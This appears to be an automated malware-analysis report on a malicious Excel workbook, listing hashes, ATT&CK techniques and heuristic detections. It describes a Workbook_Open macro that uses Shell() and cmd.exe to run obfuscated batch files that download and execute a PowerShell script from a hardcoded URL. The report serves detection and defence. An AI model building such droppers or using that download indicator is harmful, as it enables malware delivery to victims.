Office (OLE) / .XLSX malware analysis — malicious · 5a4b2c98ff5ccacd

MALICIOUS

Office (OLE) / .XLSX

33.0 KB Created: 2015-06-05 18:19:34 Authoring application: Microsoft Excel First seen: 2022-08-16

MD5: 2dc1e84a3427e2418d86c4b87fcbc078 SHA-1: 4d056539eb17ab8c4abd7e6a519ee80ede4435a9 SHA-256: 5a4b2c98ff5ccacd78b01bfc8297ca8e4cf030124d750f5f035c21c8b1003865

208 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1059.003 Windows Command Shell T1566.002 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The Workbook_Open macro is designed to execute a series of batch files that ultimately download and execute a PowerShell script from the hardcoded URL 'http://185.199.108.153/a.ps1'. The batch script itself is heavily obfuscated using string manipulation and environment variable access, indicating an attempt to evade detection. The use of Shell() and cmd.exe calls within the VBA code directly supports the execution of these malicious scripts.

Heuristics 6

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `9aae994c2e1c1317470f797f5379b50ed17f44f406e21538b812f3b5e27660ed`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5486 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.